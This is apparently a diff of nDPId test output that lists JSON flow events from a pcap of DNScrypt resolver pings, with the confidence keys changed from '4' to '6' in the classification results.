-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380832,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":39816,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":46140,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305453,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312406,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348917,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":47621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317431,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396210,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396108,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317428,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396110,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318062,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 